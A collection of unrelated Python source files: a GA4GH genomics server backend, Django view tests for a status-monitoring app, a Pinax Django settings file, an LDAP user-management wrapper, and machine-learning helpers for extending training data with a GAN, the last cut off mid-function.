chunkSize = self._maxResponseLength
# get reference bases
gbEnd = min(start + chunkSize, end)
sequence = reference.getBases(start, gbEnd)
# determine nextPageToken
if len(sequence) == chunkSize:
nextPageToken = start + chunkSize
elif len(sequence) > chunkSize:
raise exceptions.ServerError() # should never happen
else:
nextPageToken = None
# build response
response = protocol.ListReferenceBasesResponse()
response.offset = start
response.sequence = sequence
response.nextPageToken = nextPageToken
return response.toJsonString()
# Get requests.
def runGetReadGroupSet(self, id_):
"""
Returns a readGroupSet with the given id_
"""
compoundId = datamodel.ReadGroupSetCompoundId.parse(id_)
dataset = self.getDataset(compoundId.datasetId)
return self.runGetRequest(dataset.getReadGroupSetIdMap(), id_)
def runGetReadGroup(self, id_):
"""
Returns a read group with the given id_
"""
compoundId = datamodel.ReadGroupCompoundId.parse(id_)
dataset = self.getDataset(compoundId.datasetId)
return self.runGetRequest(dataset.getReadGroupIdMap(), id_)
def runGetReference(self, id_):
"""
Runs a getReference request for the specified ID.
"""
return self.runGetRequest(self._referenceIdMap, id_)
def runGetReferenceSet(self, id_):
"""
Runs a getReferenceSet request for the specified ID.
"""
return self.runGetRequest(self._referenceSetIdMap, id_)
def runGetVariantSet(self, id_):
"""
Runs a getVariantSet request for the specified ID.
"""
compoundId = datamodel.VariantSetCompoundId.parse(id_)
dataset = self.getDataset(compoundId.datasetId)
return self.runGetRequest(dataset.getVariantSetIdMap(), id_)
# Search requests.
def runSearchReadGroupSets(self, request):
"""
Runs the specified SearchReadGroupSetsRequest.
"""
return self.runSearchRequest(
request, protocol.SearchReadGroupSetsRequest,
protocol.SearchReadGroupSetsResponse,
self.readGroupSetsGenerator)
def runSearchReads(self, request):
"""
Runs the specified SearchReadsRequest.
"""
return self.runSearchRequest(
request, protocol.SearchReadsRequest,
protocol.SearchReadsResponse,
self.readsGenerator)
def runSearchReferenceSets(self, request):
"""
Runs the specified SearchReferenceSetsRequest.
"""
return self.runSearchRequest(
request, protocol.SearchReferenceSetsRequest,
protocol.SearchReferenceSetsResponse,
self.referenceSetsGenerator)
def runSearchReferences(self, request):
"""
Runs the specified SearchReferenceRequest.
"""
return self.runSearchRequest(
request, protocol.SearchReferencesRequest,
protocol.SearchReferencesResponse,
self.referencesGenerator)
def runSearchVariantSets(self, request):
"""
Runs the specified SearchVariantSetsRequest.
"""
return self.runSearchRequest(
request, protocol.SearchVariantSetsRequest,
protocol.SearchVariantSetsResponse,
self.variantSetsGenerator)
def runSearchVariants(self, request):
"""
Runs the specified SearchVariantRequest.
"""
return self.runSearchRequest(
request, protocol.SearchVariantsRequest,
protocol.SearchVariantsResponse,
self.variantsGenerator)
def runSearchCallSets(self, request):
"""
Runs the specified SearchCallSetsRequest.
"""
return self.runSearchRequest(
request, protocol.SearchCallSetsRequest,
protocol.SearchCallSetsResponse,
self.callSetsGenerator)
def runSearchDatasets(self, request):
"""
Runs the specified SearchDatasetsRequest.
"""
return self.runSearchRequest(
request, protocol.SearchDatasetsRequest,
protocol.SearchDatasetsResponse,
self.datasetsGenerator)
class EmptyBackend(AbstractBackend):
"""
A GA4GH backend that contains no data.
"""
class SimulatedBackend(AbstractBackend):
"""
A GA4GH backend backed by no data; used mostly for testing
"""
def __init__(self, randomSeed=0, numCalls=1, variantDensity=0.5,
numVariantSets=1, numReferenceSets=1,
numReferencesPerReferenceSet=1, numAlignments=2):
super(SimulatedBackend, self).__init__()
# Datasets
dataset1 = datasets.SimulatedDataset(
"simulatedDataset1", randomSeed, numCalls,
variantDensity, numVariantSets, numAlignments)
dataset2 = datasets.SimulatedDataset(
"simulatedDataset2", randomSeed, numCalls,
variantDensity, numVariantSets, numAlignments)
self._datasetIdMap[dataset1.getId()] = dataset1
self._datasetIdMap[dataset2.getId()] = dataset2
self._datasetIds = sorted(self._datasetIdMap.keys())
# References
randomGenerator = random.Random()
randomGenerator.seed(randomSeed)
for i in range(numReferenceSets):
referenceSetId = "referenceSet{}".format(i)
referenceSetSeed = randomGenerator.getrandbits(32)
referenceSet = references.SimulatedReferenceSet(
referenceSetId, referenceSetSeed,
numReferencesPerReferenceSet)
self._referenceSetIdMap[referenceSetId] = referenceSet
for reference in referenceSet.getReferences():
referenceId = reference.getId()
self._referenceIdMap[referenceId] = reference
self._referenceSetIds = sorted(self._referenceSetIdMap.keys())
self._referenceIds = sorted(self._referenceIdMap.keys())
class FileSystemBackend(AbstractBackend):
"""
A GA4GH backend backed by data on the file system
"""
def __init__(self, dataDir):
super(FileSystemBackend, self).__init__()
self._dataDir = dataDir
# TODO this code is very ugly and should be regarded as a temporary
# stop-gap until we deal with iterating over the data tree properly.
# References
referencesDirName = "references"
referenceSetDir = os.path.join(self._dataDir, referencesDirName)
for referenceSetName in os.listdir(referenceSetDir):
relativePath = os.path.join(referenceSetDir, referenceSetName)
if os.path.isdir(relativePath):
referenceSet = references.HtslibReferenceSet(
referenceSetName, relativePath)
self._referenceSetIdMap[referenceSet.getId()] = referenceSet
for reference in referenceSet.getReferences():
self._referenceIdMap[reference.getId()] = reference
self._referenceSetIds = sorted(self._referenceSetIdMap.keys())
self._referenceIds = sorted(self._referenceIdMap.keys())
# Datasets
datasetDirs = [
os.path.join(self._dataDir, directory)
for directory in os.listdir(self._dataDir)
if os.path.isdir(os.path.join(self._dataDir, directory)) and
directory != referencesDirName]
for datasetDir in datasetDirs:
dataset = datasets.FileSystemDataset(datasetDir)
self._datasetIdMap[dataset.getId()] = dataset
self._datasetIds = sorted(self._datasetIdMap.keys())
| |
# coding: utf-8
"""
informer tests for views
"""
import mock
import json
import pytest
from django.test import TestCase, Client
from informer.models import Raw
from informer.factories import RawFactory
pytestmark = pytest.mark.django_db
class DefaultViewTest(TestCase):
"""
Tests to Default View
"""
@mock.patch('celery.app.control.Control.inspect')
def test_get(self, mock):
mock.stats.return_value = {'foo': 'bar '}
client = Client()
response = client.get('/')
self.assertEqual(200, response.status_code)
expected = 'All systems are operational'
self.assertEqual(response.context['status'], expected)
expected = [
{
'name': 'database',
'operational': True,
'message': 'Your database is operational.',
'url': '/database/'
},
{
'name': 'postgres',
'operational': True,
'message': 'Your database is operational.',
'url': '/postgres/'
},
{
'name': 'storage',
'operational': True,
'message': 'Your FileSystemStorage is operational.',
'url': '/storage/'
},
{
'name': 'celery',
'operational': True,
'message': 'Celery is operational.',
'url': '/celery/'
},
{
'name': 'cache',
'operational': True,
'message': 'Your cache system is operational.',
'url': '/cache/'
}
]
self.assertEqual(response.context['result'], expected)
@mock.patch('celery.app.control.Control.inspect')
def test_get_fails(self, mock):
mock().stats.return_value = None
client = Client()
response = client.get('/')
self.assertEqual(200, response.status_code)
self.assertEqual(
'Oh no. Houston we have problemns', response.context['status'])
expected = [
{
'name': 'database',
'operational': True,
'message': 'Your database is operational.',
'url': '/database/'
},
{
'name': 'postgres',
'operational': True,
'message': 'Your database is operational.',
'url': '/postgres/'
},
{
'name': 'storage',
'operational': True,
'message': 'Your FileSystemStorage is operational.',
'url': '/storage/'
},
{
'name': 'celery',
'operational': False,
'message': 'No running Celery workers were found.',
'url': '/celery/'
},
{
'name': 'cache',
'operational': True,
'message': 'Your cache system is operational.',
'url': '/cache/'
}
]
self.assertEqual(response.context['result'], expected)
self.assertEqual(200, response.status_code)
class InformerViewTest(TestCase):
"""
Tests responses from Informer details
"""
def setUp(self):
self.client = Client()
def test_get(self):
"""
Test if 'details' from a specific Informer has a expected data
"""
response = self.client.get('/database/')
self.assertEqual(200, response.status_code)
self.assertEqual('Database', response.context['name'])
self.assertTrue(response.context['operational'])
self.assertEqual(
'Your database is operational.', response.context['message'])
self.assertTrue(isinstance(response.context['measures'], list))
@mock.patch.object(Raw.objects, 'count')
def test_get_fails(self, m_mock):
"""
Test if with 'broken scenario', all goes bad
"""
m_mock.side_effect = Raw.DoesNotExist('Boom')
response = self.client.get('/database/')
self.assertEqual(200, response.status_code)
self.assertEqual('Database', response.context['name'])
self.assertFalse(response.context['operational'])
self.assertTrue(isinstance(response.context['measures'], list))
self.assertEqual(
'An error occured when trying access database: Boom',
response.context['message'])
class MeasureViewTest(TestCase):
"""
Tests to Measure View
"""
def setUp(self):
self.client = Client()
def test_get(self):
"""
Test if 'details' from a specific Informer has a expected data
"""
RawFactory.create(indicator='Database', measure='availability')
response = self.client.get('/database/availability/')
self.assertEqual(200, response.status_code)
@mock.patch.object(Raw.objects, 'filter')
def test_get_fail(self, m_mock):
"""
Test if with 'broken scenario', all goes bad
"""
m_mock.side_effect = Exception('Boom')
response = self.client.get('/database/availability/')
self.assertEqual(200, response.status_code)
self.assertEqual(
'error trying get indicator (Database) or measure (availability)',
response.context['indicator'])
self.assertEqual(
'error trying get indicator (Database) or measure (availability)',
response.context['measure'])
self.assertTrue(isinstance(response.context['measures'], list))
class FeedViewTest(TestCase):
"""
Tests to Feed View
"""
def test_get(self):
"""
Test if feed is ok
"""
client = Client()
response = client.get('/feed/')
self.assertEqual(200, response.status_code)
| |
# -*- coding: utf-8 -*-
# Django settings for social pinax project.
import os.path
import posixpath
import pinax
PINAX_ROOT = os.path.abspath(os.path.dirname(pinax.__file__))
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
# tells Pinax to use the default theme
PINAX_THEME = 'default'
DEBUG = True
TEMPLATE_DEBUG = DEBUG
# tells Pinax to serve media through django.views.static.serve.
SERVE_MEDIA = DEBUG
INTERNAL_IPS = (
'127.0.0.1',
)
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'ado_mssql'.
DATABASE_NAME = 'dev.db' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.
# Local time zone for this installation. Choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
# although not all variations may be possible on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'US/Eastern'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'site_media', 'media')
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = '/site_media/media/'
# Absolute path to the directory that holds static files like app media.
# Example: "/home/media/media.lawrence.com/apps/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'site_media', 'static')
# URL that handles the static files like app media.
# Example: "http://media.lawrence.com"
STATIC_URL = '/site_media/static/'
# Additional directories which hold static files
STATICFILES_DIRS = (
('social_project', os.path.join(PROJECT_ROOT, 'media')),
('pinax', os.path.join(PINAX_ROOT, 'media', PINAX_THEME)),
)
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = posixpath.join(STATIC_URL, "admin/")
# Make this unique, and don't share it with anybody.
SECRET_KEY = ''
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django_openid.consumer.SessionConsumer',
'account.middleware.LocaleMiddleware',
'django.middleware.doc.XViewMiddleware',
'pagination.middleware.PaginationMiddleware',
'django_sorting.middleware.SortingMiddleware',
'djangodblog.middleware.DBLogMiddleware',
'pinax.middleware.security.HideSensistiveFieldsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.middleware.transaction.TransactionMiddleware',
)
ROOT_URLCONF = 'social_project.urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, "templates"),
os.path.join(PINAX_ROOT, "templates", PINAX_THEME),
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.core.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
"pinax.core.context_processors.pinax_settings",
"notification.context_processors.notification",
"announcements.context_processors.site_wide_announcements",
"account.context_processors.openid",
"account.context_processors.account",
"messages.context_processors.inbox",
"friends_app.context_processors.invitations",
"social_project.context_processors.combined_inbox_count",
)
COMBINED_INBOX_COUNT_SOURCES = (
"messages.context_processors.inbox",
"friends_app.context_processors.invitations",
"notification.context_processors.notification",
)
INSTALLED_APPS = (
# included
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.humanize',
'django.contrib.markup',
'pinax.templatetags',
# external
'notification', # must be first
'django_openid',
'emailconfirmation',
'django_extensions',
'robots',
'friends',
'mailer',
'messages',
'announcements',
'oembed',
'djangodblog',
'pagination',
# 'gravatar',
'threadedcomments',
'threadedcomments_extras',
'wiki',
'swaps',
'timezones',
'voting',
'voting_extras',
'tagging',
'bookmarks',
'blog',
'ajax_validation',
'photologue',
'avatar',
'flag',
'microblogging',
'locations',
'uni_form',
'django_sorting',
'django_markup',
'staticfiles',
'debug_toolbar',
# internal (for now)
'analytics',
'profiles',
'account',
'signup_codes',
'tribes',
'photos',
'tag_app',
'topics',
'groups',
'django.contrib.admin',
)
ABSOLUTE_URL_OVERRIDES = {
"auth.user": lambda o: "/profiles/profile/%s/" % o.username,
}
MARKUP_FILTER_FALLBACK = 'none'
MARKUP_CHOICES = (
('restructuredtext', u'reStructuredText'),
('textile', u'Textile'),
('markdown', u'Markdown'),
('creole', u'Creole'),
)
WIKI_MARKUP_CHOICES = MARKUP_CHOICES
AUTH_PROFILE_MODULE = 'profiles.Profile'
NOTIFICATION_LANGUAGE_MODULE = 'account.Account'
ACCOUNT_OPEN_SIGNUP = True
ACCOUNT_REQUIRED_EMAIL = False
ACCOUNT_EMAIL_VERIFICATION = False
EMAIL_CONFIRMATION_DAYS = 2
EMAIL_DEBUG = DEBUG
CONTACT_EMAIL = "feedback@example.com"
SITE_NAME = "Pinax"
LOGIN_URL = "/account/login/"
LOGIN_REDIRECT_URLNAME = "what_next"
INTERNAL_IPS = (
'127.0.0.1',
)
ugettext = lambda s: s
LANGUAGES = (
('en', u'English'),
)
# URCHIN_ID = "ua-..."
YAHOO_MAPS_API_KEY = "..."
class NullStream(object):
def write(*args, **kwargs):
pass
writeline = write
writelines = write
RESTRUCTUREDTEXT_FILTER_SETTINGS = {
'cloak_email_addresses': True,
'file_insertion_enabled': False,
'raw_enabled': False,
'warning_stream': NullStream(),
'strip_comments': True,
}
# if Django is running behind a proxy, we need to do things like use
# HTTP_X_FORWARDED_FOR instead of REMOTE_ADDR. This setting is used
# to inform apps of this fact
BEHIND_PROXY = False
FORCE_LOWERCASE_TAGS = True
WIKI_REQUIRES_LOGIN = True
# Uncomment this line after signing up for a Yahoo Maps API key at the
# following URL: https://developer.yahoo.com/wsregapp/
# YAHOO_MAPS_API_KEY = ''
# local_settings.py can be used to override environment-specific settings
# like database and email that differ between development and production.
try:
from local_settings import *
except ImportError:
pass
| |
from __future__ import absolute_import
import logging
import random
import string
import yaml
from passlib.hash import ldap_salted_sha1
try:
from yaml import CSafeLoader as YAMLLoader
except ImportError:
from yaml import SafeLoader as YAMLLoader
import ldap
from ldap import dn, modlist, SERVER_DOWN
log = logging.getLogger(__file__)
class UnknownLdapUser(Exception):
""" When user was not found in a ldap search """
class LdapWrapper(object):
""" Simple ldap class wrapper"""
_url = None
_conn = None
_base = None
_filter = None
def __init__(self, filename):
with open(filename) as fdesc:
conf = yaml.load(fdesc, YAMLLoader)
self._url = conf['ldap_url']
self._base = conf['basedn']
self._filter = conf['search_filter']
self.mail_attr = conf['mail_attr']
self.firstname_attr = conf['firstname_attr']
self.lastname_attr = conf['lastname_attr']
self.login_attr = conf['login_attr']
self.manager_attr = conf['manager_attr']
self.country_attr = conf['country_attr']
self.admin_dn = conf['admin_dn']
self.system_DN = conf['system_dn']
self.system_password = conf['system_pass']
self.team_dn = conf['team_dn']
self._conn = ldap.initialize(self._url)
self._bind(self.system_DN, self.system_password)
log.info('Ldap wrapper initialized')
def _bind(self, dn, password):
""" bind a user in ldap with given password
ldap does not support unicode for binding
so we must cast password to utf-8
"""
log.debug('binding with dn: %s' % dn)
try:
self._conn.simple_bind_s(dn, password.encode('utf-8'))
except SERVER_DOWN:
self._conn = ldap.initialize(self._url)
self._conn.simple_bind_s(dn, password.encode('utf-8'))
def _search(self, what, retrieve):
# rebind with system dn
self._bind(self.system_DN, self.system_password)
log.debug('searching: %s for: %s' % (what, retrieve))
return self._conn.search_s(self._base, ldap.SCOPE_SUBTREE, what,
retrieve)
def _search_admin(self, what, retrieve):
# rebind with system dn
self._bind(self.system_DN, self.system_password)
return self._conn.search_s(self.admin_dn, ldap.SCOPE_SUBTREE, what,
retrieve)
def _search_team(self, what, retrieve):
# rebind with system dn
self._bind(self.system_DN, self.system_password)
return self._conn.search_s(self.team_dn, ldap.SCOPE_SUBTREE, what,
retrieve)
def _search_by_item(self, item):
required_fields = ['cn', 'mail', 'uid', 'givenName', 'sn', 'manager',
'ou', 'userPassword']
res = self._search(self._filter % item, required_fields)
if not res:
raise UnknownLdapUser
USER_DN, entry = res[0]
return self.parse_ldap_entry(USER_DN, entry)
def search_user_by_login(self, login):
item = 'cn=*%s*' % login
return self._search_by_item(item)
def search_user_by_dn(self, user_dn):
item = 'cn=*%s*' % self._extract_cn(user_dn)
return self._search_by_item(item)
def _extract_country(self, user_dn):
""" Get country from a user dn """
for rdn in dn.str2dn(user_dn):
rdn = rdn[0]
if rdn[0] == self.country_attr:
return rdn[1]
def _extract_cn(self, user_dn):
""" Get cn from a user dn """
for rdn in dn.str2dn(user_dn):
rdn = rdn[0]
if rdn[0] == self.login_attr:
return rdn[1]
def parse_ldap_entry(self, user_dn, entry):
"""
Format ldap entry and parse user_dn to output dict with expected values
"""
if not user_dn or not entry:
return
data = {
'email': entry[self.mail_attr].pop(),
'lastname': entry[self.lastname_attr].pop(),
'login': entry[self.login_attr].pop(),
'manager_dn': '',
'firstname': '',
}
if self.manager_attr in entry:
data['manager_dn'] = entry[self.manager_attr].pop()
if self.firstname_attr in entry:
data['firstname'] = entry[self.firstname_attr].pop()
if 'ou' in entry:
data['ou'] = entry['ou'].pop()
if 'uid' in entry:
data['uid'] = entry['uid'].pop()
# save user dn
data['dn'] = user_dn
data['country'] = self._extract_country(user_dn)
data['manager_cn'] = self._extract_country(data['manager_dn'])
data['userPassword'] = entry['userPassword'].pop()
return data
def authenticate(self, login, password):
""" Authenticate user using given credentials """
user_data = self.search_user_by_login(login)
# try to bind with password
self._bind(user_data['dn'], password)
return user_data
def add_user(self, user, password, unit=None, uid=None):
""" Add new user into ldap directory """
# The dn of our new entry/object
dn = 'cn=%s,c=%s,%s' % (user.login, user.country, self._base)
log.info('create user %s in ldap' % dn)
# A dict to help build the "body" of the object
attrs = {}
attrs['objectClass'] = ['inetOrgPerson', 'top']
attrs['employeeType'] = ['Employee']
attrs['cn'] = [user.login.encode('utf-8')]
attrs['givenName'] = [user.firstname.encode('utf-8')]
attrs['sn'] = [user.lastname.encode('utf-8')]
if uid:
attrs['uid'] = [uid.encode('utf-8')]
attrs['mail'] = [user.email.encode('utf-8')]
if not unit:
unit = 'development'
attrs['ou'] = [unit.encode('utf-8')]
attrs['userPassword'] = [hashPassword(password)]
attrs['manager'] = [user.manager_dn.encode('utf-8')]
# Convert our dict for the add-function using modlist-module
ldif = modlist.addModlist(attrs)
log.info('sending for dn %r: %r' % (dn, ldif))
# rebind with system dn
self._bind(self.system_DN, self.system_password)
# Do the actual synchronous add-operation to the ldapserver
self._conn.add_s(dn, ldif)
# return password to display it to the administrator
return dn
def update_user(self, user, password=None, unit=None):
""" Update user params in ldap directory """
# convert fields to ldap fields
# retrieve them from model as it was updated before
fields = {
'mail': [user.email.encode('utf-8')],
'givenName': [user.firstname.encode('utf-8')],
'sn': [user.lastname.encode('utf-8')],
'manager': [user.manager_dn.encode('utf-8')],
}
if password:
fields['userPassword'] = password
if unit:
fields['ou'] = [unit.encode('utf-8')]
# dn of object we want to update
dn = 'cn=%s,c=%s,%s' % (user.login, user.country, self._base)
log.info('updating user %s from ldap' % dn)
# retrieve current user information
required = ['objectClass', 'employeeType', 'cn', 'givenName', 'sn',
'manager', 'mail', 'ou', 'uid', 'userPassword']
item = 'cn=*%s*' % user.login
res = self._search(self._filter % item, required)
USER_DN, entry = res[0]
old = {}
new = {}
# for each field to be updated
for field in fields:
# get old value
old[field] = entry.get(field, '')
# set new value
new[field] = fields[field]
# Convert place-holders for modify-operation using modlist-module
ldif = modlist.modifyModlist(old, new)
if ldif:
# rebind with system dn
self._bind(self.system_DN, self.system_password)
log.info('sending for dn %r: %r' % (dn, ldif))
# Do the actual modification if needed
self._conn.modify_s(dn, ldif)
def delete_user(self, user_dn):
""" Delete user from ldap """
log.info('deleting user %s from ldap' % user_dn)
# retrieve current user information
required = ['employeeType']
item = 'cn=*%s*' % self._extract_cn(user_dn)
res = self._search(self._filter % item, required)
USER_DN, entry = res[0]
old = {
'employeeType': entry['employeeType'],
}
new = {
'employeeType': 'Inactive',
}
# Convert place-holders for modify-operation using modlist-module
ldif = modlist.modifyModlist(old, new)
if ldif:
# rebind with system dn
self._bind(self.system_DN, self.system_password)
log.info('sending for dn %r: %r' % (user_dn, ldif))
# Do the actual modification if needed
self._conn.modify_s(user_dn, ldif)
def update_team(self, team, members):
""" Update team members in ldap directory """
# dn of object we want to update
dn = 'cn=%s,%s' % (team, self.team_dn)
log.info('updating team %s from ldap' % team)
# retrieve current team members
team_members = self.get_team_members(team)
old = {'member': team_members}
new = {'member': members}
# Convert place-holders for modify-operation using modlist-module
ldif = modlist.modifyModlist(old, new)
if ldif:
# rebind with system dn
self._bind(self.system_DN, self.system_password)
log.info('sending for dn %r: %r' % (dn, ldif))
# Do the actual modification if needed
self._conn.modify_s(dn, ldif)
def get_hr_by_country(self, country):
""" Get hr mail of country for a user_dn"""
what = '(member=*)'
results = self._search_admin(what, None)
for USER_DN, res_entry in results:
for entry in res_entry['member']:
item = self._extract_country(entry)
if item == country:
# found valid hr user for this country
login = self._extract_cn(entry)
user_data = self.search_user_by_login(login)
return user_data
# security if no admin per country found, take the last one
login = self._extract_cn(entry)
user_data = self.search_user_by_login(login)
return user_data
def list_ou(self):
""" Retrieve available organisational units """
# rebind with system dn
self._bind(self.system_DN, self.system_password)
# retrieve all users so we can extract OU
required = None
item = '(member=*)'
res = self._search_team(item, required)
units = []
for USER_DN, entry in res:
units.append(USER_DN)
# only return unique entries
return set(units)
def list_teams(self):
""" Retrieve available teams """
# rebind with system dn
self._bind(self.system_DN, self.system_password)
# retrieve all teams so we can extract members
required = None
item = '(member=*)'
res = self._search_team(item, required)
teams = {}
for USER_DN, entry in res:
if 'manager' not in entry['cn'][0]:
teams[entry['cn'][0]] = entry['member']
return teams
def list_manager(self):
""" Retrieve available managers dn """
# rebind with system dn
self._bind(self.system_DN, self.system_password)
# retrieve all users so we can extract OU
required = None
item = '(&(member=*)(cn=manager*))'
res = self._search_team(item, required)
USER_DN, entry = res[0]
managers = entry['member']
# only return unique entries
return sorted(managers)
def list_admin(self):
""" Retrieve available admins dn """
# rebind with system dn
self._bind(self.system_DN, self.system_password)
# retrieve all users so we can extract OU
required = None
item = '(member=*)'
res = self._search_admin(item, required)
USER_DN, entry = res[0]
managers = entry['member']
# only return unique entries
return sorted(managers)
def get_users_units(self):
""" Retrieve ou for all users """
# rebind with system dn
self._bind(self.system_DN, self.system_password)
# retrieve all users so we can extract OU
required = ['ou']
item = 'cn=*'
res = self._search(item, required)
users_units = {}
for USER_DN, entry in res:
if USER_DN not in users_units:
users_units[USER_DN] = {}
if 'ou' in entry:
users_units[USER_DN]['ou'] = entry['ou'][0]
return users_units
def get_team_members(self, team):
""" Retrieve team members list """
# rebind with system dn
self._bind(self.system_DN, self.system_password)
# retrieve all teams so we can extract members
required = None
item = '(&(cn=*%s*)(member=*))' % team
res = self._search_team(item, required)
_, entry = res[0]
return entry['member']
class LdapCache(object):
""" Ldap cache class singleton """
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
raise RuntimeError('Ldap is not initialized')
return cls._instance
@classmethod
def configure(cls, settings):
cls._instance = cls.from_config(settings)
@classmethod
def from_config(cls, config, **kwargs):
"""
Return a Ldap client object configured from the given configuration.
"""
return LdapWrapper(config)
def hashPassword(password):
""" Generate a password in SSHA format suitable for ldap """
return ldap_salted_sha1.encrypt(password)
def randomstring(length=8):
""" Generates a random ascii string """
chars = string.letters + string.digits
# Generate string from population
data = [random.choice(chars) for _ in xrange(length)]
return ''.join(data)
| |
import gc
from typing import List
import numpy as np
import pandas as pd
from ctgan import CTGANSynthesizer
from sklearn.model_selection import StratifiedKFold
from model import Model
def save_dict_to_file(dic: dict, path: str, save_raw=False) -> None:
"""
Save dict values into txt file
:param dic: Dict with values
:param path: Path to .txt file
:return: None
"""
f = open(path, "w")
if save_raw:
f.write(str(dic))
else:
for k, v in dic.items():
f.write(str(k))
f.write(str(v))
f.write("\n\n")
f.close()
def save_exp_to_file(dic: dict, path: str) -> None:
"""
Save dict values into txt file
:param dic: Dict with values
:param path: Path to .txt file
:return: None
"""
f = open(path, "a+")
keys = dic.keys()
vals = [str(val) for val in dic.values()]
if f.tell() == 0:
header = "\t".join(keys)
f.write(header + "\n")
row = "\t".join(vals)
f.write(row + "\n")
f.close()
def cat_cols_info(
X_train: pd.DataFrame, X_test: pd.DataFrame, cat_cols: List[str]
) -> dict:
"""
Get the main info about cat columns in dataframe, i.e. num of values, uniqueness
:param X_train: Train dataframe
:param X_test: Test dataframe
:param cat_cols: List of categorical columns
:return: Dict with results
"""
cc_info = {}
for col in cat_cols:
train_values = set(X_train[col])
number_of_new_test = len(set(X_test[col]) - train_values)
fraction_of_new_test = np.mean(
X_test[col].apply(lambda v: v not in train_values)
)
cc_info[col] = {
"num_uniq_train": X_train[col].nunique(),
"num_uniq_test": X_test[col].nunique(),
"number_of_new_test": number_of_new_test,
"fraction_of_new_test": fraction_of_new_test,
}
return cc_info
def adversarial_test(left_df, right_df, cat_cols):
"""
Trains adversarial model to distinguish train from test
:param left_df: dataframe
:param right_df: dataframe
:param cat_cols: List of categorical columns
:return: trained model
"""
# sample to shuffle the data
left_df = left_df.copy().sample(frac=1).reset_index(drop=True)
right_df = right_df.copy().sample(frac=1).reset_index(drop=True)
left_df = left_df.head(right_df.shape[0])
right_df = right_df.head(left_df.shape[0])
left_df["gt"] = 0
right_df["gt"] = 1
concated = pd.concat([left_df, right_df])
lgb_model = Model(
cat_validation="Single",
encoders_names=("OrdinalEncoder",),
cat_cols=cat_cols,
model_validation=StratifiedKFold(n_splits=3, shuffle=True, random_state=42),
model_params={
"metrics": "AUC",
"max_depth": 2,
"max_bin": 100,
"n_estimators": 500,
"learning_rate": 0.02,
"random_state": 42,
},
)
train_score, val_score, avg_num_trees = lgb_model.fit(
concated.drop("gt", axis=1), concated["gt"]
)
print(
"ROC AUC adversarial: train %.2f%% val %.2f%%"
% (train_score * 100.0, val_score * 100.0)
)
return lgb_model
def extend_gan_train(x_train, y_train, x_test, cat_cols, gen_x_times=1.2, epochs=300):
"""
Extends train by generating new data by GAN
:param x_train: train dataframe
:param y_train: target for train dataframe
:param x_test: dataframe
:param cat_cols: List of categorical columns
:param gen_x_times: Factor for which initial dataframe should be increased
:param cat_cols: List of categorical columns
:param epochs: Number of epoch max to train the GAN
:return: extended train with target
"""
if gen_x_times == 0:
raise ValueError("Passed gen_x_times with value 0!")
x_train["target"] = y_train
x_test_bigger = int(1.1 * x_test.shape[0] / x_train.shape[0])
ctgan = CTGANSynthesizer()
ctgan.fit(x_train, cat_cols, epochs=epochs)
generated_df = ctgan.sample((x_test_bigger) * x_train.shape[0])
data_dtype = x_train.dtypes.values
for i in range(len(generated_df.columns)):
generated_df[generated_df.columns[i]] = generated_df[
generated_df.columns[i]
].astype(data_dtype[i])
generated_df = pd.concat(
[
x_train.sample(frac=(x_test_bigger), replace=True, random_state=42),
generated_df,
]
).reset_index(drop=True)
num_cols = []
for col in x_train.columns:
if "num" in col:
num_cols.append(col)
for num_col in num_cols:
min_val = x_test[num_col].quantile(0.02)
max_val = x_test[num_col].quantile(0.98)
generated_df = generated_df.loc[
(generated_df[num_col] >= min_val) & (generated_df[num_col] <= max_val)
]
generated_df = generated_df.reset_index(drop=True)
ad_model = adversarial_test(x_test, generated_df.drop("target", axis=1), cat_cols)
generated_df["test_similarity"] = ad_model.predict(
generated_df.drop("target", axis=1), return_shape=False
)
generated_df.sort_values("test_similarity", ascending=False, inplace=True)
generated_df = generated_df.head(int(gen_x_times * x_train.shape[0]))
x_train = pd.concat(
[x_train, generated_df.drop("test_similarity", axis=1)], axis=0
).reset_index(drop=True)
del generated_df
gc.collect()
return x_train.drop("target", axis=1), x_train["target"]
def extend_from_original(x_train, y_train, x_test, cat_cols, gen_x_times=1.2):
"""
Extends train by generating new data by GAN
:param x_train: train dataframe
:param y_train: target for train dataframe
:param x_test: dataframe
:param cat_cols: List of categorical columns
:param gen_x_times: Factor for which initial dataframe should be increased
:param cat_cols: List of categorical columns
:return: extended train with target
"""
if gen_x_times == 0:
